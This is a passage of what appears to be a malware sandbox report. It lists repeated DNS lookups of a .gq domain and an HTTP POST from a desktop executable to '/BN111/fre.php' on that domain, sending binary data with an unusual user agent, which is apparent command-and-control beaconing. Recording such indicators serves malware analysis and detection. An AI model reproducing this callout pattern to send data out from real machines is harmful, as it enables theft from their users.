Oct 14, 2021 08:28:32.486987114 CEST	8.8.8.8	192.168.2.6	0x3d76	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:33.648431063 CEST	8.8.8.8	192.168.2.6	0x69a5	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:33.648431063 CEST	8.8.8.8	192.168.2.6	0x69a5	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:34.869492054 CEST	8.8.8.8	192.168.2.6	0x38b	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:34.869492054 CEST	8.8.8.8	192.168.2.6	0x38b	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:35.970498085 CEST	8.8.8.8	192.168.2.6	0xc4a	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:35.970498085 CEST	8.8.8.8	192.168.2.6	0xc4a	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:37.092448950 CEST	8.8.8.8	192.168.2.6	0x7d39	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:37.092448950 CEST	8.8.8.8	192.168.2.6	0x7d39	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:38.365737915 CEST	8.8.8.8	192.168.2.6	0xe711	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:38.365737915 CEST	8.8.8.8	192.168.2.6	0xe711	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:39.491631031 CEST	8.8.8.8	192.168.2.6	0x25ef	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:39.491631031 CEST	8.8.8.8	192.168.2.6	0x25ef	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:41.065442085 CEST	8.8.8.8	192.168.2.6	0x4f40	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:41.065442085 CEST	8.8.8.8	192.168.2.6	0x4f40	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:42.252979994 CEST	8.8.8.8	192.168.2.6	0x6b50	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:42.252979994 CEST	8.8.8.8	192.168.2.6	0x6b50	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:43.845922947 CEST	8.8.8.8	192.168.2.6	0xcc8c	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:43.845922947 CEST	8.8.8.8	192.168.2.6	0xcc8c	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:45.178029060 CEST	8.8.8.8	192.168.2.6	0xae8b	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:45.178029060 CEST	8.8.8.8	192.168.2.6	0xae8b	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:48.019318104 CEST	8.8.8.8	192.168.2.6	0xd0fe	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:48.019318104 CEST	8.8.8.8	192.168.2.6	0xd0fe	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:49.638375998 CEST	8.8.8.8	192.168.2.6	0x1cfe	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:49.638375998 CEST	8.8.8.8	192.168.2.6	0x1cfe	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:50.949512959 CEST	8.8.8.8	192.168.2.6	0x2f14	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:50.949512959 CEST	8.8.8.8	192.168.2.6	0x2f14	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:52.300395012 CEST	8.8.8.8	192.168.2.6	0x9b51	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:52.300395012 CEST	8.8.8.8	192.168.2.6	0x9b51	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:53.543016911 CEST	8.8.8.8	192.168.2.6	0x9b5c	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:53.543016911 CEST	8.8.8.8	192.168.2.6	0x9b5c	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:54.625006914 CEST	8.8.8.8	192.168.2.6	0xfaf	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:54.625006914 CEST	8.8.8.8	192.168.2.6	0xfaf	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:56.054569006 CEST	8.8.8.8	192.168.2.6	0xc5d7	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:56.054569006 CEST	8.8.8.8	192.168.2.6	0xc5d7	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:57.496562958 CEST	8.8.8.8	192.168.2.6	0x7539	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:57.496562958 CEST	8.8.8.8	192.168.2.6	0x7539	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:58.857067108 CEST	8.8.8.8	192.168.2.6	0xcc85	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:28:58.857067108 CEST	8.8.8.8	192.168.2.6	0xcc85	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:00.278069973 CEST	8.8.8.8	192.168.2.6	0xca48	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:00.278069973 CEST	8.8.8.8	192.168.2.6	0xca48	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:01.640744925 CEST	8.8.8.8	192.168.2.6	0x41fe	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:01.640744925 CEST	8.8.8.8	192.168.2.6	0x41fe	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:03.056396961 CEST	8.8.8.8	192.168.2.6	0x76cb	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:03.056396961 CEST	8.8.8.8	192.168.2.6	0x76cb	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:06.133622885 CEST	8.8.8.8	192.168.2.6	0xe495	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:06.133622885 CEST	8.8.8.8	192.168.2.6	0xe495	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:07.510478020 CEST	8.8.8.8	192.168.2.6	0xc716	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:07.510478020 CEST	8.8.8.8	192.168.2.6	0xc716	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:08.701395035 CEST	8.8.8.8	192.168.2.6	0x56ca	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:08.701395035 CEST	8.8.8.8	192.168.2.6	0x56ca	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:09.889010906 CEST	8.8.8.8	192.168.2.6	0xad00	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:09.889010906 CEST	8.8.8.8	192.168.2.6	0xad00	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:11.098392010 CEST	8.8.8.8	192.168.2.6	0xfca0	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:11.098392010 CEST	8.8.8.8	192.168.2.6	0xfca0	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:12.326812029 CEST	8.8.8.8	192.168.2.6	0xce7c	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:12.326812029 CEST	8.8.8.8	192.168.2.6	0xce7c	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:13.634321928 CEST	8.8.8.8	192.168.2.6	0xb217	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:13.634321928 CEST	8.8.8.8	192.168.2.6	0xb217	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:15.112957954 CEST	8.8.8.8	192.168.2.6	0x1e24	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:15.112957954 CEST	8.8.8.8	192.168.2.6	0x1e24	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:16.638273001 CEST	8.8.8.8	192.168.2.6	0xce2a	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:16.638273001 CEST	8.8.8.8	192.168.2.6	0xce2a	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:17.987740993 CEST	8.8.8.8	192.168.2.6	0xf846	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:17.987740993 CEST	8.8.8.8	192.168.2.6	0xf846	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:20.374650002 CEST	8.8.8.8	192.168.2.6	0xfa06	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:20.374650002 CEST	8.8.8.8	192.168.2.6	0xfa06	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:21.795156002 CEST	8.8.8.8	192.168.2.6	0xc8c9	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:21.795156002 CEST	8.8.8.8	192.168.2.6	0xc8c9	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:23.396900892 CEST	8.8.8.8	192.168.2.6	0x4036	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:23.396900892 CEST	8.8.8.8	192.168.2.6	0x4036	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:27.445975065 CEST	8.8.8.8	192.168.2.6	0x9f87	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:27.445975065 CEST	8.8.8.8	192.168.2.6	0x9f87	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:29.624861002 CEST	8.8.8.8	192.168.2.6	0xf256	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:29.624861002 CEST	8.8.8.8	192.168.2.6	0xf256	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:31.713087082 CEST	8.8.8.8	192.168.2.6	0xb97a	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:31.713087082 CEST	8.8.8.8	192.168.2.6	0xb97a	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:32.984905005 CEST	8.8.8.8	192.168.2.6	0xe4c9	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:32.984905005 CEST	8.8.8.8	192.168.2.6	0xe4c9	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:35.243751049 CEST	8.8.8.8	192.168.2.6	0x3787	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:35.243751049 CEST	8.8.8.8	192.168.2.6	0x3787	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:36.947783947 CEST	8.8.8.8	192.168.2.6	0x493	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:36.947783947 CEST	8.8.8.8	192.168.2.6	0x493	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:38.117574930 CEST	8.8.8.8	192.168.2.6	0x3e93	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:38.117574930 CEST	8.8.8.8	192.168.2.6	0x3e93	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:39.349596024 CEST	8.8.8.8	192.168.2.6	0x6c70	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:39.349596024 CEST	8.8.8.8	192.168.2.6	0x6c70	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:40.681256056 CEST	8.8.8.8	192.168.2.6	0x37c8	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:40.681256056 CEST	8.8.8.8	192.168.2.6	0x37c8	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:41.851002932 CEST	8.8.8.8	192.168.2.6	0x82b7	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:41.851002932 CEST	8.8.8.8	192.168.2.6	0x82b7	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:43.256962061 CEST	8.8.8.8	192.168.2.6	0xed11	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:43.256962061 CEST	8.8.8.8	192.168.2.6	0xed11	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:44.406697989 CEST	8.8.8.8	192.168.2.6	0xcc0d	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:44.406697989 CEST	8.8.8.8	192.168.2.6	0xcc0d	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:45.741152048 CEST	8.8.8.8	192.168.2.6	0x5ccf	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:45.741152048 CEST	8.8.8.8	192.168.2.6	0x5ccf	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:46.900079012 CEST	8.8.8.8	192.168.2.6	0x83f	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:46.900079012 CEST	8.8.8.8	192.168.2.6	0x83f	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:48.029814005 CEST	8.8.8.8	192.168.2.6	0x69c5	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:48.029814005 CEST	8.8.8.8	192.168.2.6	0x69c5	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:49.299062967 CEST	8.8.8.8	192.168.2.6	0x6449	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:49.299062967 CEST	8.8.8.8	192.168.2.6	0x6449	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:51.858999968 CEST	8.8.8.8	192.168.2.6	0x6899	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:51.858999968 CEST	8.8.8.8	192.168.2.6	0x6899	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:55.815201998 CEST	8.8.8.8	192.168.2.6	0xdfe6	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:55.815201998 CEST	8.8.8.8	192.168.2.6	0xdfe6	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:56.942806959 CEST	8.8.8.8	192.168.2.6	0xdd17	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:56.942806959 CEST	8.8.8.8	192.168.2.6	0xdd17	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:58.047533989 CEST	8.8.8.8	192.168.2.6	0xb23	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:58.047533989 CEST	8.8.8.8	192.168.2.6	0xb23	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:59.205523968 CEST	8.8.8.8	192.168.2.6	0x4332	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:29:59.205523968 CEST	8.8.8.8	192.168.2.6	0x4332	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:00.285648108 CEST	8.8.8.8	192.168.2.6	0x4e	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:00.285648108 CEST	8.8.8.8	192.168.2.6	0x4e	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:01.393187046 CEST	8.8.8.8	192.168.2.6	0xbb96	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:01.393187046 CEST	8.8.8.8	192.168.2.6	0xbb96	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:02.525789976 CEST	8.8.8.8	192.168.2.6	0x9297	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:02.525789976 CEST	8.8.8.8	192.168.2.6	0x9297	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:03.674351931 CEST	8.8.8.8	192.168.2.6	0x202f	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:03.674351931 CEST	8.8.8.8	192.168.2.6	0x202f	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:04.856111050 CEST	8.8.8.8	192.168.2.6	0x89b0	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:04.856111050 CEST	8.8.8.8	192.168.2.6	0x89b0	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:05.935167074 CEST	8.8.8.8	192.168.2.6	0xe22d	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:05.935167074 CEST	8.8.8.8	192.168.2.6	0xe22d	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:07.119254112 CEST	8.8.8.8	192.168.2.6	0x1524	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:07.119254112 CEST	8.8.8.8	192.168.2.6	0x1524	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:08.415246964 CEST	8.8.8.8	192.168.2.6	0x1ae7	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:08.415246964 CEST	8.8.8.8	192.168.2.6	0x1ae7	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:09.670599937 CEST	8.8.8.8	192.168.2.6	0xbc15	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:09.670599937 CEST	8.8.8.8	192.168.2.6	0xbc15	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:11.109034061 CEST	8.8.8.8	192.168.2.6	0xdd1	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:11.109034061 CEST	8.8.8.8	192.168.2.6	0xdd1	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:12.891690969 CEST	8.8.8.8	192.168.2.6	0x11e2	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:12.891690969 CEST	8.8.8.8	192.168.2.6	0x11e2	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:15.314672947 CEST	8.8.8.8	192.168.2.6	0x9cc	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:15.314672947 CEST	8.8.8.8	192.168.2.6	0x9cc	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:16.658160925 CEST	8.8.8.8	192.168.2.6	0x2770	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:16.658160925 CEST	8.8.8.8	192.168.2.6	0x2770	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:18.291595936 CEST	8.8.8.8	192.168.2.6	0x6e34	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	172.67.219.104	A (IP address)	IN (0x0001)
Oct 14, 2021 08:30:18.291595936 CEST	8.8.8.8	192.168.2.6	0x6e34	No error (0)	74f26d34ffff049368a6cff8812f86ee.gq	104.21.62.32	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

74f26d34ffff049368a6cff8812f86ee.gq

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49779	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:19.047157049 CEST	1054	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 196 Connection: close
Oct 14, 2021 08:28:19.209945917 CEST	1055	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tc%2BH09Yr5HaypHMlBF4iUDG3nhys2pPE4zSX4LGjecWNJzGpM%2B99gDFRrUNEMRf3eoe2rHO1C%2BujLeyZYYPL6AvWl4cI4PR4ssIE72e%2BnJtPmjJiBKaVLXSCw8d0%2BL7Ql8nO18QK89ttl7gsAcZIK9ns5%2B1G5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf331c2f691f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49780	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

